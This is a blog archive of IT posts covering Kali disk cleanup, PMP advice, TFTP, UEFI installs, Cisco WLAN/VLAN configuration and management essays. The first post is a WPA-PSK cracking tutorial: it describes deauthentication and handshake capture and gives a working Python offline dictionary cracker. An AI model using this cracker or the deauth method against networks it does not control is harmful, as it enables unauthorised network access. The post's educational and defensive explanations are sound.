Friday, February 13, 2015

How to Hack a WPA Wireless Network (Wifi) using Aircrack-ng and John the Ripper


Here is a video tutorial I created showing how easy it is to break into a wireless network protected with a WPA pre-shared key. It's a short 12-minute video and I hope you find it not only instructional, but also liberating. After all, informed people make the best decisions.


John the Ripper (JtR) cracks passwords offline, so an access point's lockout after a number of failed attempts never comes into play. As you can see in the video, aireplay-ng injects forged deauthentication frames, spoofing the access point's address, which kicks every connected client off the network; the clients reconnect automatically, without their users noticing. On reconnection the client and the access point run the WPA 4-way handshake. The pre-shared key (PSK) itself is never transmitted: the handshake carries two random nonces and a message integrity code (MIC) computed with a key that is derived from the PSK, the SSID, the nonces and the two MAC addresses. airodump-ng records that exchange in the file "wificrack.cap", and JtR then works through a wordlist, deriving the key for each candidate passphrase and checking whether it reproduces the captured MIC; a match means the candidate is the PSK. Note the limit this implies: the attack only recovers passphrases that are in the wordlist (or that JtR's rules can generate from it), so a long random PSK is not recoverable this way. In the video you can also see that the airodump-ng output file is an ordinary pcap, so it opens in Wireshark, which reveals a lot about the clients associated with the access point. For instance, the vendor prefix (OUI) of the MAC addresses tells us the access point is a Cisco-Li (Cisco-Linksys) device and the handshake we captured came from an Apple device. The full MAC addresses are shown as well.
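The offline check described above, written out as an added example (this is not code from the post, from aircrack-ng or from John the Ripper): for each wordlist entry it derives the PMK with PBKDF2 as 802.11i specifies, expands it to the PTK, and compares the EAPOL MIC it would produce with the one in the capture. The handshake here is constructed inside the script rather than read from a .cap file; the SSID "ExampleNet", the two MAC addresses and the passphrase are placeholders, the nonces are random, and message 2 is a minimal WPA2 (RSN descriptor, key descriptor version 2) frame. The PBKDF2 step is checked against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
"""Offline WPA2-PSK handshake check (added example; not the post's, aircrack-ng's or JtR's code).

The captured 4-way handshake holds nonces, MAC addresses and a MIC, never the
passphrase. A cracker derives the key for each candidate and checks the MIC.
All handshake material below is constructed for the example.
"""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class Handshake:
    ssid: bytes
    ap_mac: bytes      # 6 bytes, the authenticator address (AA)
    sta_mac: bytes     # 6 bytes, the supplicant address (SPA)
    anonce: bytes      # 32 bytes, from message 1 (AP -> client)
    snonce: bytes      # 32 bytes, from message 2 (client -> AP)
    eapol: bytes       # message 2 EAPOL-Key frame with its 16-byte MIC field zeroed
    mic: bytes         # the MIC as captured in that frame


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # 4096 HMACs per guess is what bounds the cracking speed.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ...
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    # Byte-string min/max is the big-endian unsigned comparison the standard calls for.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf(pmk, b"Pairwise key expansion", data, 64)
    return ptk[:16]  # KCK = first 128 bits of the PTK; it only authenticates the EAPOL frames


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    # WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    # WPA1/TKIP (version 1) uses HMAC-MD5 instead; not handled here.
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the wordlist entry that reproduces the captured MIC, or None."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue  # WPA passphrases are 8..63 characters; skip impossible guesses
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        kck = kck_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic):
            return candidate
    return None


# EAPOL hdr (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + key IV (16) + key RSC (8) + key ID (8) = 81: where the 16-byte MIC starts.
MIC_OFFSET = 81


def _build_msg2(snonce: bytes) -> bytes:
    # Minimal EAPOL-Key message 2 (RSN descriptor, key info 0x010a, empty key data), MIC zeroed.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def synthetic_capture(passphrase: str, ssid: bytes = b"ExampleNet") -> Handshake:
    """Constructed stand-in for the airodump-ng capture: placeholder MACs, random nonces."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = os.urandom(32), os.urandom(32)
    msg2 = _build_msg2(snonce)
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    # In a real capture the MIC sits at msg2[MIC_OFFSET:MIC_OFFSET + 16]; a cracker copies it
    # out and zeroes that field before hashing, which is the state kept in hs.eapol here.
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, eapol_mic(kck, msg2))


if __name__ == "__main__":
    hs = synthetic_capture("sunshine1")
    print(crack(hs, ["password", "12345678", "sunshine1", "letmein!"]))
```

Reading a real capture means pulling the same seven fields out of the beacon (SSID) and the EAPOL frames with a pcap parser; everything after that is the loop above, which is also why the speed of the attack is set by PBKDF2 and not by anything the access point does.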

Wednesday, February 4, 2015

Freeing Disk Space in Kali Linux (Basic steps), Especially the apt-get Cache

Kali is a Debian-based Linux distribution developed with penetration testers in mind. Think of it as a toolbox: it is basically Debian, but with the penetration testing tools already installed, for free. This includes Metasploit, the OpenVAS vulnerability scanner, Exploit-DB, Hydra, aircrack-ng, John the Ripper, etc. These come on top of the formidable tools common to any Linux, such as OpenSSH (for creating tunnels), netcat and nmap, to name a few.

Since Kali is Debian, the methods used here apply to any Debian-based Linux system, Ubuntu included. Because we are talking about Kali, which is usually run as 'root', most of the screenshots show the commands being run as root. If you are not logged in as root, just add 'sudo' to the beginning of every command. For example, instead of issuing the command 'apt-get clean', type 'sudo apt-get clean'.

Let us assume you get an error in your Kali Linux saying that you are running out of space. In the screenshot below, my Kali runs on Oracle VirtualBox with a dynamically allocated 15 GB disk. "Dynamically allocated" only means the disk image file on the host grows as the guest writes to it, up to that 15 GB ceiling; inside the guest the disk is still 15 GB and can fill up. So I still want to free some space.


[Screenshot: Kali warning that the disk is running out of space]
Step 1: Check the disk space and where you are consuming the most of it. Use df -h; the '-h' option tells df to format the result in a 'human-readable' way.


[Screenshot: df -h results showing the entire disk as "full"]

Tuesday, January 27, 2015

Practical Advice in Pursuing the Project Management Professional (PMP) Credential

Recently I became a Project Management Professional (PMP) credential holder. I personally found the exam tough and the entire process stringent, so I consider this achievement a milestone in my career.

In this post I will give advice, based on my own experience, on how to make the most of the effort and the money required to achieve the credential.

Just recently somebody asked me what my foremost advice would be for someone seriously working toward the PMP certification. My foremost advice is also the most obvious.

1. Become a member of the Project Management Institute (PMI). The benefits of membership are numerous. First, you get an immediate saving of approximately $10.00 on your application fee. The application fee for the CBT (computer-based test) is $405 for members and $555 for non-members. To become a member you are charged some $140 in membership fees, so in all a new PMI member applying for the PMP pays $545, versus $555 for a non-member. BUT (the big BUT): as a member you get free access to the latest edition of the Project Management Body of Knowledge (the PMBOK Guide), on which most of the PMP exam questions are based. Also, as a PMI member you get access to the MyPMI dashboard (a portion of which is shown above). The dashboard makes it easy to apply for the credential online, which is a big relief. PMI requires you to document 4,500 project hours if you hold a degree, or 7,500 project hours if you hold a secondary school (high school) diploma. These hours must span all five process groups (initiating, planning, executing, monitoring and controlling, closing) and must not overlap. They also need to be logged per project and confirmed by your direct supervisor.


I had a colleague who logged the project hours on PMI's paper forms. They are tedious and tend to get messy. The online application form is cleaner (shown on the right) and makes it easier to track whether you have already reached the number of hours required to apply for the credential.

Which brings me to my next advice.

2. Make sure to log your project hours accurately, and discuss the project descriptions with your manager. The application process allows for certain liberties; after all, the project hours are estimates. But if your application is selected for audit, your manager will be required to confirm your application, particularly the project hours, durations and descriptions, by signing it and adding comments in a sealed envelope. This also means...

Friday, June 13, 2014

How to configure TFTP Server in your Linux Machine (Debian), and how to solve Permission Denied Error (Error Code 2)

I personally use a virtualized Kali Linux on my Windows 7 machine for a lot of things, primarily IT security analysis and research for the companies I work with. But mostly I find that keeping a Linux machine as a VM image comes in handy in many ways: I can use the Kali/Linux machine as a TFTP/SCP server to back up devices;

So suppose you want to copy startup-config files from your Cisco device to your laptop, which runs Kali Linux (Debian) in a virtual machine. Let us suppose further that your Cisco router or switch cannot do SSH; otherwise we would simply use SCP, which is safer (encrypted and authenticated) and needs no special configuration on the Linux side beyond OpenSSH. Keep in mind what TFTP is: it has no authentication and no encryption, and a startup-config carries passwords and SNMP communities, so bring the server up only on an isolated segment for the duration of the copy and stop it afterwards.

Here's how to do it:  

  1. Make sure the virtual machine's network adapter is bridged to your Windows 7 machine's Ethernet adapter. I'm using VirtualBox, so in my case I first have to create a bridged adapter: in VirtualBox itself (not in the guest OS or the virtual machine's window) click File >> Preferences >> Network, then under the Bridged Adapters tab create at least one adapter.
  2. Then, in your guest/virtual machine, click Machine >> Settings >> Network and choose Bridged Adapter (not NAT). After that you need to run ifdown eth0 and ifup eth0 in your Kali/Linux console so the interface picks up an address.
    ** Bridging will not work when port-security is configured on the switchport the computer is plugged into, which is the case in most enterprise networks. If you are doing this inside your office and the VM is not getting a DHCP address, ask your network engineer or corporate IT whether port-security is enabled.

Sunday, June 8, 2014

How to Install Windows 7 on a UEFI enabled Computer

We recently bought a Lenovo T440s and immediately loved it, except that it came with Windows 8 Professional 64-bit. It had "downgrade rights" to Windows 7 Pro 64-bit. Unfortunately, our corporate IT environment does not (yet) encourage Windows 8 on laptops or desktops, so I was obliged to downgrade it to Windows 7 Pro/Enterprise.

The T440s is optimized for Windows 8 and ships with UEFI and Secure Boot enabled. As an IT professional I am also interested in how UEFI works (later I'll write a post after I successfully install Kali Linux in dual-boot on a UEFI system) and whether it delivers on its promise. UEFI is explained in detail at the links in the original post, including Microsoft's own description of it.

Do note that UEFI systems behave differently depending on the model and brand of the computer. This how-to post is specific to the T440s. While the concept and the general procedure are the same as for other laptops (Acer, Asus, HP, Dell, etc.), the behavior may differ slightly.


The Objective: Install Windows 7 Professional 64-bit on a UEFI-enabled Lenovo T440s.

Before we begin, let us first discuss the differences between installing Windows in UEFI mode and in non-UEFI mode (aka Legacy Boot mode):
  1. A UEFI installation of Windows 7 only works with the 64-bit edition.
  2. Windows XP cannot boot in UEFI mode at all.
  3. By default the T440s ships with Windows 8, with UEFI and Secure Boot enabled. Windows 7 can boot in UEFI mode, but it does not support Secure Boot, so Secure Boot has to be turned off in the firmware setup before a Windows 7 installer will start. Be aware of what that costs you: Secure Boot is the firmware's signature check on the bootloader, so with it off, a tampered bootloader is no longer detected at that stage. If your Lenovo ThinkPad T440s shipped with Windows 7, these settings have already been changed for you.
  4. The T440s has no CD/DVD drive, so you either attach an external drive or create an EFI-bootable Windows 7 USB stick. The stick must be FAT32-formatted, because UEFI firmware only reads FAT filesystems at boot.

Here's how:

  1. Go to the firmware (BIOS) setup by rebooting your Lenovo ThinkPad T440s and repeatedly pressing F1 until you get to the setup screen.

Tuesday, March 4, 2014

Configuring Cisco WLAN with multiple SSIDs in different VLANs - Part 1


note: Screenshots and configuration examples use a Cisco 2500 series WLAN controller (aka WLC). The 2500 series controller is connected to a Cisco 3750 or 3650 L3 switch. This article assumes that inter-VLAN routing is already working and only the WLAN controller needs to be configured.

Enterprise networks usually run multiple VLANs. The Wi-Fi access points give clients access to each of these VLANs by broadcasting different SSIDs, each attached to its own WLAN profile. Let's say we want to configure our WLAN controller to broadcast two SSIDs, namely:

1. GUEST on VLAN 5 (10.8.5.0/24);
2. IT-Department on VLAN 13 (10.8.6.0/24);

Also, let's assume VLAN 219 is pre-configured with the following information:

1. VLAN 219 is NETWORK-VLAN (10.8.219.0/24)
2. interface vlan 219 IP address is 10.8.219.1
3. a DHCP server located in VLAN 219 with IP address 10.8.219.50/24.
4. WLAN controller will be configured with IP address 10.8.219.251 in VLAN 219
5. the Access Points (APs) 10.8.219.248-250, also in VLAN 219.

There are two parts to this task. The first is the VLAN configuration required on our 3750/3650 layer 3 switch, which is discussed in this article. Part 2 is configuring our WLAN controller with the WLAN profiles, SSIDs and interfaces. For brevity I will skip the inter-VLAN configuration and assume that the network converges and inter-VLAN routing is configured properly.

Part 1: Configure the 3750/3650 layer 3 switch

1. Configure the port interface in our L3 switch as a trunk:


  interface GigabitEthernet1/0/23
   description *** LINK TO WIRELESS-CONTROLLER ***
   switchport trunk encapsulation dot1q
   ! 219 has to be on the list too: the WLC management interface and the APs are in it.
   ! Write the list without spaces.
   switchport trunk allowed vlan 5,13,219
   switchport mode trunk
   
!The next commands are optional
   switchport trunk native vlan 219
   udld port aggressive

  • "switchport trunk allowed vlan <list>" restricts the trunk to the listed VLANs; anything else, the native VLAN included if it is not listed, is dropped. I recommend it: it keeps other VLANs' broadcasts off the trunk and keeps the controller from reaching VLANs it has no business in. In this case VLANs 5 (Guest) and 13 (IT-Department) are allowed, and 219 must be allowed as well, because the controller's management interface and the access points live there; with only 5 and 13 listed the controller would be unreachable.
  • "switchport trunk native vlan <ID>" changes which VLAN is carried untagged on the trunk. By default that is VLAN 1, which is well known and should not carry anything, so we move it. The native VLAN is not a place where all VLAN traffic converges; it is simply the one VLAN whose frames have no 802.1Q tag. Use 219 as the native VLAN only if the controller's management interface is left untagged (VLAN 0 on the WLC). If you tag the management interface with 219 on the controller instead, which is what Cisco recommends, leave the native VLAN on an unused VLAN: Catalyst switches drop tagged frames that carry the native VLAN's ID. This command is optional.
  • "udld port aggressive" is an optional configuration. It detects a link that has become unidirectional and error-disables the port, which prevents spanning-tree loops. UDLD has to run on both ends of the link to do anything; a WLAN controller does not participate in UDLD, so on this link the command is harmless but does nothing, and it belongs on switch-to-switch trunks.

Configuring Cisco WLAN with multiple SSIDs in different VLANs - Part 2

This is part 2/2 of the series. Part 1 discussed the assumptions and the required layer 3 switch configuration. Please read Part 1 before this one (link in the original post).
======================================================================
 note: Screenshots and configuration examples use a Cisco 2500 series WLAN controller (aka WLC). The 2500 series controller is connected to a Cisco 3750 or 3650 L3 switch. This article assumes that inter-VLAN routing is already working and only the WLAN controller needs to be configured.


======================================================================
IMPORTANT REMINDER: before you do any of the configuration, check that the controller's software supports your access point model. A lightweight AP (the post calls it the LWAPP, after the older join protocol; 7.x controllers use CAPWAP) downloads the controller's image when it joins, so the AP's own image version does not have to match the controller's. What does matter is that the controller runs a release new enough to know the AP model: Cisco's release notes list the supported APs per release, and a controller on older code than the AP model requires will refuse the join. A quick "show version" on the AP and "show sysinfo" on the WLC will save you all the time and effort.


From the lightweight AP (the default username is "Cisco" and the password is "Cisco"):

output of show version:

cisco AIR-CAP702I-F-K9 (MIPS74k) processor (revision 01) with 73728K/57344K bytes of memory.
Processor board ID KWC184402C5
MIPS74k CPU at 40Mhz, revision number 0x0000
Last reset from power-on
LWAPP image version 7.5.1.33
1 Gigabit Ethernet interface

AIR-CAP means this is a lightweight access point (aka a controller-based access point). If the model starts with AIR-SAP, it is an autonomous (standalone) access point running autonomous IOS, and it will not join the controller unless it is first converted to lightweight mode.

From the Controller:

(Cisco Controller) >show sysinfo

Manufacturer's Name.............................. Cisco Systems Inc.
Product Name..................................... Cisco Controller
Product Version.................................. 7.4.121.0
Bootloader Version............................... 1.0.20
Field Recovery Image Version..................... 1.0.0
Firmware Version................................. PIC 16.0

In this case, configuring the WLAN controller and the AP will not work: the AP will not join. The AP's factory image, 7.5.1.33, comes from a newer release train than the controller's 7.4.121.0, which is the sign that the AP model post-dates the controller code. The fix is to upgrade the controller's image; downgrading the AP would not help, because the controller still would not recognize the model.

=======================================================================

Part 2: Configure the WLAN Controller

In the first part, we discussed the Layer 3 switch configuration requirements. In case you missed it, please read the first part of this article here: Configuring Cisco WLAN with multiple SSIDs in different VLANs - Part 1

As usual, the first thing to do is plug the WLAN controller's port 1 into the trunk-configured port on the L3 switch (discussed in Part 1). Port 1 is the green-colored port in the figure below.




The other three ports will be connected to your access points (APs). For brevity, we will not discuss configuring licenses or upgrading firmware in this article.
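Part 2 stops before the controller commands themselves, so here is an added example of the configuration the series sets out to show, written for the AireOS command line of the 2500 series and using the VLANs and addresses from Part 1; it is not copied from the post. The dynamic-interface addresses 10.8.5.251 and 10.8.6.251, their gateways 10.8.5.1 and 10.8.6.1, the interface names GUEST and IT-DEPT and the passphrase placeholders are assumptions. Lines starting with "!" are annotations, not commands (AireOS has no comment syntax).

```text
! Management interface in VLAN 219, tagged. Because it is tagged, VLAN 219 must be in the
! trunk's allowed list on the switch, and the trunk's native VLAN must NOT be 219 (a Catalyst
! drops tagged frames carrying the native VLAN ID). If you used Part 1's optional
! "switchport trunk native vlan 219", set the management VLAN to 0 (untagged) instead.
config interface address management 10.8.219.251 255.255.255.0 10.8.219.1
config interface vlan management 219
config interface port management 1
config interface dhcp management primary 10.8.219.50

! One dynamic interface per client VLAN; the WLC relays DHCP to the server in VLAN 219.
! Interface addresses (.251) and gateways (.1) are assumptions.
config interface create GUEST 5
config interface address dynamic-interface GUEST 10.8.5.251 255.255.255.0 10.8.5.1
config interface port GUEST 1
config interface dhcp dynamic-interface GUEST primary 10.8.219.50

config interface create IT-DEPT 13
config interface address dynamic-interface IT-DEPT 10.8.6.251 255.255.255.0 10.8.6.1
config interface port IT-DEPT 1
config interface dhcp dynamic-interface IT-DEPT primary 10.8.219.50

! WLAN 1: SSID GUEST -> interface GUEST. WPA2 with AES only (no TKIP), PSK, and
! peer blocking so guest clients cannot talk to each other through the AP.
config wlan create 1 GUEST GUEST
config wlan interface 1 GUEST
config wlan security wpa enable 1
config wlan security wpa wpa2 enable 1
config wlan security wpa wpa2 ciphers aes enable 1
config wlan security wpa akm 802.1x disable 1
config wlan security wpa akm psk enable 1
config wlan security wpa akm psk set-key ascii <guest-passphrase> 1
config wlan peer-blocking drop 1
config wlan enable 1

! WLAN 2: SSID IT-Department -> interface IT-DEPT. Same WPA2/AES settings; see note below.
config wlan create 2 IT-Department IT-Department
config wlan interface 2 IT-DEPT
config wlan security wpa enable 2
config wlan security wpa wpa2 enable 2
config wlan security wpa wpa2 ciphers aes enable 2
config wlan security wpa akm 802.1x disable 2
config wlan security wpa akm psk enable 2
config wlan security wpa akm psk set-key ascii <it-passphrase> 2
config wlan enable 2

! Verify: each WLAN should show its interface and "Enabled"; each interface its VLAN.
show wlan summary
show interface summary
save config
```

The two SSIDs end up in different VLANs purely because each WLAN is bound to a different dynamic interface; the switch trunk from Part 1 is what carries the tags. A WLAN has to be disabled while its security settings change, which is why the commands run before "config wlan enable". For the IT-Department SSID, a shared PSK is the weaker choice: with the first post of this blog in mind, a PSK is recoverable offline from one captured handshake if it is guessable, and it has to be rotated whenever someone leaves, so that WLAN is better moved to WPA2-Enterprise (akm 802.1x with a RADIUS server) once one is available.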

Sunday, August 18, 2013

Compelling Scoreboards Do Keep Projects on Track

Technology management involves liberal amounts of project management. Like construction engineers and architects, we technology managers often find ourselves being asked to design technology solutions and to implement them. But for most of us, driving projects to completion on time and within budget has proven challenging, especially in this era where most technology projects are implemented by vendors and outsourced partners.

Over the years I have found that keeping a compelling scoreboard for a project not only helps me, as the project manager, track its progress, but also elicits commitment from the implementing team, vendors included. It also makes communicating the project's progress to other stakeholders (executives, other departments) easier. Keeping a compelling scoreboard is extolled as discipline three in FranklinCovey's The 4 Disciplines of Execution (4DX). While 4DX's approach is utilitarian and practicable, scoreboards (or dashboards) are not unique to 4DX; they are also espoused in various management frameworks and theses (the Project Management Institute, the Balanced Scorecard, etc.). It is in 4DX, though, that the case that "scoreboards should be compelling" is consistently made.

Take the snapshot of the simple project management scoreboard below as an example. Its template can also be downloaded (link provided below) to help you start a scoreboard for your own projects.

All effective scoreboards share the following characteristics:

Monday, May 28, 2012

Build or Buy Analysis: Determining the True Cost of Software Development vs. Ready Made Solutions

When faced with the choice of building an IT system or leasing or subscribing to a ready-made cloud-based solution, most of us do what we were taught in management school. We open our trusty Excel workbook and compute the cost of the application by estimating the materials and person-hours required to complete the project.



We do this by first forecasting the number of person-hours it would take to build the system. Then we put a monetary value on those person-hours, usually the average salary of the software engineers who will be hired to build the system plus a little overhead. We then add all the other materials needed to finish the system, such as the cost of servers, peripherals, etc.

We then estimate the yearly cost of maintaining the system, which we usually approximate at 20% of the initial build cost. After that we pick a discount rate between 8% and 12% (10% is usually the sweet spot) and do a Net Present Value (NPV) calculation of the system's Total Cost of Ownership (TCO) from year 0 (today) to year 4. We top it off by adding another 10%-20% contingency reserve to cover 'other unforeseen costs'.

After doing all that, we go window-shopping. We go through a list of cloud-based solutions and ask for their subscription costs. We compare the yearly subscription cost of cloud-based solutions A, B, C... with the cost of building the system. Finally we are ready to decide: do we develop our own custom application, or do we lease or subscribe to a Software as a Service (SaaS) solution?

If this is how you do decision analyses, I encourage you to look back at the last 5-10 build-or-buy decisions you made. You will find that you usually decided to build the application, either in-house or through outsourced development partners. Rarely (perhaps one time in ten, or even less) did you decide in favor of a cloud-based solution.

Sunday, May 6, 2012

Do VLANs Unduly Complicate the Network?

Simplifying the IT infrastructure is among the top priorities of IT executives. The various surveys claiming that CIOs are beginning to embrace Software as a Service (SaaS) models are in fact proof that simplifying the infrastructure is a key objective. The more complicated the IT infrastructure becomes, the more expensive it is to maintain, and the more person-hours it takes to fulfill change requests.

As an IT manager, simplifying my IT support structure is also one of my key goals. One of the most common discussion points on this subject is the number of VLANs required for a branch office, or whether VLANs are needed at all in a branch office network design.

My answer is always 'yes'. Surprisingly, I often find myself defending that position.